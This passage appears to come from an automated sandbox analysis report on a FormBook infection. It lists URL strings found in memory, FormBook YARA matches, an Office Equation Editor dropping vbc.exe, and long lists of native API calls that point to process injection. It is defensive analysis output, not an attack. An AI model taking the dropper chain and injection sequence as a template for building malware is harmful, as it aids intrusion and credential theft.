          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2151311549.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2160820434.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2151585169.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418300 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181CE NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041827A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183AB NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A10D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A1148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A01D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A1930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A0C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007A1D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0079FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418300 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181CE NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041827A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004183AB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F800C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F807AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FD8C NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FC60 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FFB4 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FED0 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F801D4 NtSetValueKey
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F81148 NtOpenThread
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F8010C NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F810D0 NtOpenProcessToken
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F80078 NtResumeThread
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F80060 NtQuerySection
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F80048 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F81930 NtSetContextThread
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7F938 NtWriteFile
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7F8CC NtWaitForSingleObject
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FBE8 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FA50 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FA20 NtQueryInformationFile
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F81D80 NtSuspendThread
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FD5C NtEnumerateKey
